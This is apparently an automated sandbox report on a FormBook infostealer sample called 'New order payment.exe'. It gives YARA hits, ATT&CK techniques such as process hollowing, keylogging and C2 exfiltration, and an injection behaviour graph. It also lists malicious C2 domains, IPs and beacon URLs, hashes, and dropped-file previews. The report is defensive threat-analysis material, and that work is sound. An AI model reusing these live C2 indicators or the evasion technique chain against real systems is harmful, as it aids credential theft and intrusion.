          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmp  Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File sources: the same unpacked PE files and memory dumps listed under Stealing of Sensitive Information above.

          Mitre Att&ck Matrix

Techniques by tactic (trailing digits are reproduced as shown in the original matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 612; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion 2; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 1; File Deletion 1
Credential Access: Input Capture 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 131; Virtualization/Sandbox Evasion 2; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture 1; Archive Collected Data 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 510241 | Sample: New order payment.exe | Startdate: 27/10/2021 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.rbrituelbeaute.com; www.pronogtiki.store; 3 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
  -> New order payment.exe [17] (started)
     Dropped file: C:\Users\user\AppData\Local\...\fsfowpfjd.dll, PE32
     Signatures: Injects a PE file into a foreign processes
     -> New order payment.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP: srchwithus.online 137.184.31.35, 49792, 80 PANDGUS United States; salvationshippingsecurity.com 51.210.240.92, 49755, 80 OVHFR France; 13 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
           -> svchost.exe (started)
              Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe [1] (started)
                 -> conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
New order payment.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.0.New order payment.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.New order payment.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.2.New order payment.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.New order payment.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.New order payment.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.New order payment.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
14.2.svchost.exe.3015000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.New order payment.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.1.New order payment.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.New order payment.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.0.New order payment.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.New order payment.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.2.svchost.exe.3d3796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.New order payment.exe.f020000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
srchwithus.online | 137.184.31.35 | true | true | | unknown
www.itskosi.com | 3.67.234.155 | true | true | | unknown
www.sejiw3.xyz | 35.241.55.103 | true | false | | unknown
www.crisisinterventionadvocates.com | 74.208.236.134 | true | true | | unknown
salvationshippingsecurity.com | 51.210.240.92 | true | true | | unknown
heyunshangcheng.info | 34.102.136.180 | true | false | | unknown
hanansalman.com | 160.153.136.3 | true | true | | unknown
dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com | 52.210.179.84 | true | false | | high
www.pronogtiki.store | 5.101.153.216 | true | false | | unknown
www.hanansalman.com | unknown | unknown | true | | unknown
www.rbrituelbeaute.com | unknown | unknown | true | | unknown
www.srchwithus.online | unknown | unknown | true | | unknown
www.heyunshangcheng.info | unknown | unknown | true | | unknown
www.christinegagnonjewellery.com | unknown | unknown | true | | unknown
www.mykombuchafactory.com | unknown | unknown | true | | unknown
www.salvationshippingsecurity.com | unknown | unknown | true | | unknown
www.sfcn-dng.com | unknown | unknown | true | | unknown
www.umgaleloacademy.com | unknown | unknown | true | | unknown

                                              Contacted URLs


                                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
http://181ue.com/sq.html?entry= | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | New order payment.exe | false | | high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
https://pre-mpnewyear.uc.cn/iceberg/page/log?domain= | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
https://hm.baidu.com/hm.js? | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
https://track.uc.cn/collect | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | New order payment.exe | false | | high

                                                              Contacted IPs

                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
3.67.234.155 | www.itskosi.com | United States | 16509 | AMAZON-02US | true
35.241.55.103 | www.sejiw3.xyz | United States | 15169 | GOOGLEUS | false
137.184.31.35 | srchwithus.online | United States | 11003 | PANDGUS | true
160.153.136.3 | hanansalman.com | United States | 21501 | GODADDY-AMSDE | true
34.102.136.180 | heyunshangcheng.info | United States | 15169 | GOOGLEUS | false
51.210.240.92 | salvationshippingsecurity.com | France | 16276 | OVHFR | true
74.208.236.134 | www.crisisinterventionadvocates.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

                                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510241
Start date: 27.10.2021
Start time: 16:18:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New order payment.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@13/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 25.3% (good quality ratio 22.9%)
• Quality average: 74.1%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.82.209.183, 131.253.33.200, 13.107.22.200, 23.211.6.115, 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235
• Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              3.67.234.155vbc.exeGet hashmaliciousBrowse
                                                              • www.glitchpunks.art/rqan/?FXrTDbp=jnMNyp94RS/IcoH3ZvP/NOH36q1LYo6/R+lq5wFtk9bUimsXlekUNLj3i57DwIz4vqVE&gJ=0r60d
                                                              160.153.136.3LsSAq5zX9w.exeGet hashmaliciousBrowse
                                                              • www.baileysepictravel.com/dnz9/?6loH=HDBI6A2bi8qC5gQIk9C/o97/70OIUcVPSl9mt5FnDf+a2+QbRu9zzZgRocBvF69/z8+/&X2M0dv=U47LvnbHD
                                                              Associated Sample Name / URL | Detection | Context
                                                              CONTRACT 18641.xlsx | malicious | www.markarge.com/fqiq/?m6Gd=YR-dILR0AVm&1bft=XEjjI14qJtIhFAlWwrI6OtCMD91wQ8G2c0pwY2Wm0y537Ju/QhVbfxOd4lzzCDtuT3jtCg==
                                                              POSGORSGL2110210416.exe | malicious | www.kairoslabs.online/k8u7/?7n=8pZlPfF8exzP&Xt=UN2Ex4ZV8S2AzoiVSxOUVtIK+XqPfQ/0GeJkMW2dP6CUD1qdgaiz/h3No2ujUgdu3B2bDim+Uw==
                                                              Shipping_Doc190dk0lwt837.exe | malicious | www.classyeventsco.com/u5eh/?4h=Ve4yD4c+bxfkWvAu5JtOx2/FvaTcxJhGL9dwSQEH3HdPCEPJ4VTJqzzWkduQsZB1LkFI&o0Dd6f=wDKpS
                                                              oacNxjkyOK.exe | malicious | www.trulyproofreading.com/ons6/?XfrpLn7h=lDtwWyYf/tjNRrMKaxijla4C6BSVX1zcEr89iyqtK0AraHCaIM2/d/0s7y6LOlomVdUy&t2Mp=cHPxvxKpXXcDTFG
                                                              PRUCHASE ORDER RFQ#8086A_461A_0000086_300_3550_2021.exe | malicious | www.matchmakerfiji.com/g8ni/?dN98=ZRG8k8Cp-FExEhZ&g81=wqLORJbd3NDQJpY7Bh+B9Eg20CJ38JcoCHdnxmRPgM4OGEJfZEoqSxxRIm4R6PU1tm8p
                                                              7akn2hhXCM.exe | malicious | www.markarge.com/fqiq/?pZYXXHg=XEjjI14vJqIlFQpayrI6OtCMD91wQ8G2c0xgE1KnwS5274C5XxEXJ12f7AfPZjZdc22d&vZ=WVSH
                                                              Nuevo Pago 15.10.2021.exe | malicious | www.hilldetailingllc.com/u9xn/?U48=/bfrzf55ANR6uIwFVoEkow0ehd5wxQkDZihcFVS9iR+gkFpFPCLs2yfFdYuQRb7WlbbcZb539A==&_t6LLh=LrcX2bO8WritDXI
                                                              P6R0TOMu8G.exe | malicious | www.royalglossesbss.com/kzk9/?TFQL=snKgl6WD8Kfag/4VITdCSZ+dIpE6xAsfIuYLwIgeOQgYPVWc0Iv6Ny7FZANl0/5y3r8A&x8Lx=dN6hub48nxT
                                                              DHL Shipment Notification 74683783.exe | malicious | www.tantrapremmoksha.com/i6rd/?Zp80Q2q=UyMOySmTS9NXltILgyAikwebT1bgkkBT8/3XfHHd5QTh/p4C+Kxo/1kpyJY77mKQsLCeeHuWXA==&p4=QBTt
                                                              RNIpSzBRVC.exe | malicious | www.thehomedesigncentre.com/ef6c/?l6phLTh=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtJVae7/6etPLfXwg==&UL=5j0Ll4TXePsH7TFp
                                                              Remittance Advice.xlsx | malicious | www.matchmakerfiji.com/hr8n/?e2JtT=jVeTzlG8KlLhA&ufbtFP7=uqExRQ5sB23qpaoe9NJ0sqy/Fh86B865GT83lUAMW9QYuoHVLygt4PSEZGaiHS5fg2g4Fw==
                                                              MIN8gr0eOj.exe | malicious | www.georgialogisticscontractors.com/pusp/?nnf=uXFBoWTZtuMh2HTsrmmdA8fVM1sPFIdCr4Q56KFd0hKLdN1X2GZAX2QOaOJs2FNGNHZs&l0G=g0DTGJ5xhz3djJ
                                                              p83BktbXwe.exe | malicious | www.thehomedesigncentre.com/ef6c/?YFQLD6=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtwKr+4xsCqPLfQjQ==&j0Dxf4=ilHXd
                                                              pdrAizaO1R.exe | malicious | www.thehomedesigncentre.com/ef6c/?9rQxK=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtJVae7/6etPLfXwg==&w4z=Wnyl
                                                              7wrbIuHmx6.exe | malicious | www.murdabudz.com/mjyv/?ErzH5Le=hg13/nVrKdmTxrsZOoVMHFZDgDUsR9Gv/azPg7g6DqoZmOv7GwW2X7nbApn2zeue/bsr&7nil=Fxlpd
                                                              m2F8C6rz9J.exe | malicious | www.thekalimasigroup.com/zizv/?1bT8s=1bbhp0_P&FL0lxhs=6uUlmC4VPdsWT90f9fz6PjebrQ3sc5QRqhCVehk5HlH0wZ2u06vji4tSj593BPqSlafA
                                                              Cl8RbDkHcC.exe | malicious | www.murdabudz.com/mjyv/?UfT=JtUdoHt0I&0HzpcX=hg13/nVrKdmTxrsZOoVMHFZDgDUsR9Gv/azPg7g6DqoZmOv7GwW2X7nbAqL1vuimy6R96Z/v3Q==
                                                              Scan0012974- proof of Payment .doc | malicious | www.sherwoodmastiff.com/hht8/?8pDxgP=UdJvmcuJRPp7sd84RNsoQAu26okuAPtZrff/9Sn2Okly+EZd2NBX7o1J65nwYvo98E3HGw==&ypQH=2djTEXUx-n
                                                              TgbHWecXSn.exe | malicious | www.vectobal.com/bckt/?2d_TM=9nu0kQ8BG7S/EHKB1xRIkvMjXK8kVUyVa0yFsrPmJOrAq13FhloDHZa6MocgXNKBXPgXR63qbQ==&YZ4X=u4X4qH_h

                                                              Domains

                                                              Associated Sample Name / URL | Detection | Context
                                                              Match: www.itskosi.com
                                                              pago atrasado.exe | malicious | 46.101.121.244
                                                              Match: dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com
                                                              Diagram and Specifications.exe | malicious | 52.210.179.84
                                                              ZeVbJ7HLUZ.exe | malicious | 34.254.166.140
                                                              bank.doc.exe | malicious | 34.243.160.251
                                                              E1bCgdZF3a.msi | malicious | 52.50.39.94
                                                              FaxMessage5645345.html | malicious | 52.17.15.53
                                                              enlu5xSNKV.exe | malicious | 52.49.20.157
                                                              New _Items.Xlsx.Pdf.exe | malicious | 54.246.199.25
                                                              9V3LjvhSMb.exe | malicious | 52.49.20.157
                                                              COAU7229898130.xlsx | malicious | 34.240.98.209
                                                              PO # 5524792.exe | malicious | 34.248.153.214
                                                              order.exe.exe | malicious | 52.48.207.46
                                                              Match: www.crisisinterventionadvocates.com
                                                              Nuevo Pago 15.10.2021.exe | malicious | 74.208.236.134
                                                              pago atrasado.exe | malicious | 74.208.236.134

                                                              ASN

                                                              Associated Sample Name / URL | Detection | Context
                                                              PANDGUSJDLA241DJW5.vbs | malicious | 137.184.83.38
                                                              KPz4ERtS9a | malicious | 143.23.212.59
                                                              F3br85KuNX | malicious | 151.211.164.129
                                                              jviIYCvWBc | malicious | 143.14.132.166
                                                              b3astmode.x86 | malicious | 155.127.26.63
                                                              sora.x86 | malicious | 143.5.192.211
                                                              tqQd9hibj0 | malicious | 151.214.3.12
                                                              gjoqKYwnGG | malicious | 143.10.0.223
                                                              Kot3UfQMDm | malicious | 151.208.234.132
                                                              7qvn4qlmi3 | malicious | 143.39.140.85
                                                              sora.arm | malicious | 143.38.203.222
                                                              MMpysQ37RU | malicious | 151.223.33.119
                                                              arm7 | malicious | 143.40.8.22
                                                              pandora.arm | malicious | 143.12.216.157
                                                              arm.light | malicious | 143.40.61.251
                                                              x86 | malicious | 151.216.2.111
                                                              JIUq8a4ITS | malicious | 143.39.72.207
                                                              mYBcqY8XIj | malicious | 143.30.225.13
                                                              KEgx4lC3Ni | malicious | 143.8.201.67
                                                              hoho.arm7 | malicious | 151.219.242.116
                                                              Match: AMAZON-02US
                                                              Copy Payment 10272021 pdf.exe | malicious | 13.214.5.92
                                                              2jFfKOEefN.exe | malicious | 52.58.78.16
                                                              SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exe | malicious | 44.231.165.140
                                                              usuyeoiSVT.exe | malicious | 3.108.154.143
                                                              CONTRACT 18639.xlsx | malicious | 44.227.76.166
                                                              jGK42jrs2j.exe | malicious | 52.95.169.56
                                                              nCEHDEKsvv | malicious | 54.171.230.55
                                                              gqqrsjn4g8 | malicious | 34.249.145.219
                                                              10CV2biW2d | malicious | 34.249.145.219
                                                              mdOr6C8jJp | malicious | 54.171.230.55
                                                              DpK5nUwiwE.exe | malicious | 52.84.170.66
                                                              DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe | malicious | 52.95.169.64
                                                              p3IJWYfJZw.exe | malicious | 52.95.169.12
                                                              Requested Items.xlsx | malicious | 44.227.65.245
                                                              6iUUqpBnNi.exe | malicious | 54.240.171.70
                                                              x6d8L7ju1g.exe | malicious | 54.240.171.70
                                                              SfFC2cykMw.exe | malicious | 54.240.171.70
                                                              0L3hPPGkT5.exe | malicious | 54.240.171.70
                                                              fdQVuf4rYN.exe | malicious | 3.22.15.135
                                                              2LM4yR5arf.exe | malicious | 54.240.171.70
                                                              Match: GODADDY-AMSDE
                                                              LsSAq5zX9w.exe | malicious | 160.153.136.3
                                                              Hq0UKVWTFV.exe | malicious | 160.153.132.203
                                                              Ru185nQI3s.exe | malicious | 160.153.132.203
                                                              CONTRACT 18641.xlsx | malicious | 160.153.136.3
                                                              POSGORSGL2110210416.exe | malicious | 160.153.136.3
                                                              Shipping_Doc190dk0lwt837.exe | malicious | 160.153.136.3
                                                              oacNxjkyOK.exe | malicious | 160.153.136.3
                                                              statement and Payment.xls.scr.exe | malicious | 160.153.133.158
                                                              vm7MKM5wzi.exe | malicious | 160.153.133.158
                                                              QVDW8JEUn7.exe | malicious | 160.153.133.158
                                                              PRUCHASE ORDER RFQ#8086A_461A_0000086_300_3550_2021.exe | malicious | 160.153.136.3
                                                              Shipping Documents.exe | malicious | 160.153.137.210
                                                              sh1i15951I | malicious | 160.153.160.208
                                                              7akn2hhXCM.exe | malicious | 160.153.136.3
                                                              Nuevo Pago 15.10.2021.exe | malicious | 160.153.136.3
                                                              DHL-Waybill.exe | malicious | 160.153.137.163
                                                              b3astmode.arm7 | malicious | 188.121.44.165
                                                              DHL-Waybill.exe | malicious | 160.153.137.163
                                                              Scan_34668000.exe | malicious | 160.153.137.210
                                                              P6R0TOMu8G.exe | malicious | 160.153.136.3

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll
                                                              Process:C:\Users\user\Desktop\New order payment.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):6.518815680444944
                                                              Encrypted:false
                                                              SSDEEP:384:dwLoSt9/A0G24y0CNMPVRFOpFyb8n9g8jjY0C6C2w3efDR4McatJsIf:dwcSt9lG24yUP8+i9BjjbC6Hw34DeKt2
                                                              MD5:6F6E2F6F2744B49B7B411448F0F3EB13
                                                              SHA1:942CAD5FAA2BA6099414609F79B9D54A9B52919C
                                                              SHA-256:74650C5DCC320E98F88369FD97A4A84F7485160441AA1CC985D2912B3E0DFA00
                                                              SHA-512:8948C5C1B1010FA38D7BE0D0C4FF159939AC44D320E2AEA3C9709135FFD79507CD8EFD1633DD04AA8EFB26EFD8FFA1A30A6830F106227D81E8085771D40FFE7B
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..O&...&...&.....}.'......$.......'......"...2..1...&...p.......'.......'.....E.'.......'...Rich&...........PE..L.....ya...........!.....&...,...............@............................................@..........................A..H....C.......p...............................A...............................................@...............................text...f$.......&.................. ..`.rdata..T....@.......*..............@..@.data........P.......8..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\t45r2i1mcwvd2
                                                              Process:C:\Users\user\Desktop\New order payment.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):216784
                                                              Entropy (8bit):7.989811901336501
                                                              Encrypted:false
                                                              SSDEEP:6144:ZkPO5LByk8SPZBWDBgZcAY8ezH+VSErbZ:Zkm5qSPDWDBgl8zlU
                                                              MD5:B17E78680F254A5E243E10573F4FA8A8
                                                              SHA1:BDA800E70F4AD0326FEE948535556753D5E71791
                                                              SHA-256:CCDC289AC3CD254A46AA2DD634500261CFEC9AFBC4396A24A9564C986752F225
                                                              SHA-512:07166C2B200FAD8C263FC691D62EE7A1A9B1F342AB05776968897DC2304C0482BFA83AB1665023CC69EA3AE877F44AA262B83D294AFAEA6E42C734DACB7C60A2
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: ..>..'T...p.M..r.....P-.7V}....Q.ZN..TCB.U...C...R..3T.P:W..U.+ny...@..RQ..L....C.G..B.....}.o.%..N........G.....h..?.6..5..8.......8c5..9..b{..,:$.;+..i5..^..90.0.%E2.(.)...0.S...$..= .!...Z.Y..q"]..Pm+.....'.N..J..(.h.z....{Y.Z...0.p.........<).j_.'T.%..l..a.-..@.'.P..8....Q<ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.kd.2p.).p....... C!...Z......M.........'.N...i.(.h.z....{m.Z...0.p..h......)*j_.'T."+.l..a.-..[....P..8....Q.ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.E2.(.)..10....".. .!...Z......M.P.......'.N...i.(.h.z....{m.Z...0.p..h......)*j_.'T."+.l..a.-..[....P..8....Q.ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.E2.(.)..10....".. .!...Z......M.P.......'.N...i.(.h.

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.925228618525558
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:New order payment.exe
                                                              File size:254147
                                                              MD5:0c301355b11c3bc570d18b02bb7c99d8
                                                              SHA1:b35295390555e6fc0b85d538dafbfb4cf8c68564
                                                              SHA256:77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
                                                              SHA512:a84f50ca4ab7f2e7d29388dfc3ddd152437ad049a0b61d30462f0a2fcfbc21e0810bd5851bcae172c613eebf8c4c70c5073c3f641beca700acaa6d35582b3e25
                                                              SSDEEP:6144:wBlL/cqz/4YGOAWponolG63Sqjcj75Z6SMTKuazVY+xDh:CeqD4bOhonylilZnYKuaxY+xDh
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                              File Icon

                                                              Icon Hash:b2a88c96b2ca6a72

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4030fb
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
